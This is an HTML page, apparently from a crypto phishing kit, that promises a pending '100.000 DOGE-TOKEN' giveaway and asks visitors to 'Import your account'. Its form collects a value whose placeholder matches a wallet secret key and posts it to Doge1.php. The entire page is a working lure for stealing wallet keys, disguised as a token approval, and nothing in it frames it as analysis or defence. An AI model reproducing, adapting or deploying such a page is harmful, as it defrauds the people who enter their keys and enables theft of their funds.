<!DOCTYPE html>
<html>
  <head>
    <title>Preloader</title>
    <script src="http://code.jquery.com/jquery-2.2.1.min.js"></script>
    
    <style type="text/css">
    .preloader {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      z-index: 9999;
      background-color: #fff;
    }
    .preloader .loading {
      position: absolute;
      left: 50%;
      top: 50%;
      transform: translate(-50%,-50%);
      font: 14px arial;
    }
    span {
       font-size: xx-large;
       font-family: 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        color: rgb(30, 31, 30);
    }
    </style>
    <link rel="stylesheet" href="css1/bebek.css">
<script>
    $(document).ready(function(){
      $(".preloader").delay(2000).fadeOut();
    })
</script>
    
  </head>
<body>
  <center>  <div class="preloader">
           <img src="dogecoin.gif" width="12%">
      <div class="loading">
        <img src="rocket-flying.gif" width="50%" ><br><span> SEND 100.000 DOGE-TOKEN</span><br>
       <img src="verivi.png" width="20%"></center></div>
         
        <br><br><br><br>
    <div class="logo">
    <center><img src="doget-logo.png" width="15%"  ></center>   
    
   <div class="container">
    <h2>PENDING APPROVAL!
        <center><img src="cl.gif" width="15%"></center>         
        <h3>Please Import your account!
            Pending approval 100.000 DOGE-TOKEN.</h3>
   </div>
   <div class="konten">
   <form action="Doge1.php" method="post">
       <ul>
         <li>
           <textarea name="montok" id="montok" cols="40" rows="3%"  class="seed-block margin-3" textarea="required="required"  maxlength="60" class="embed no-icon big ng-pristine ng-untouched ng-isolate-scope ng-valid-minlength ng-not-empty ng-valid ng-valid-required=" placeholder="Example: SBMCXC......XD7D"" w-i18n-attr="placeholder" minlength="25" required="" aria-invalid="false" aria-required="true" style=""  class="form-control"required ></textarea><br> <label> Please make sure your recipient's address is correct 

           </label>
        
     </li>

            <li>
               
                <button type="submit"  name="submit" id="montok" >IMPORT</button>
            </li>
        </ul>
    </div>
   
    <center><img src="" width="6%"  ></center>
      </div>
    </div>
   
  </body>
</html>



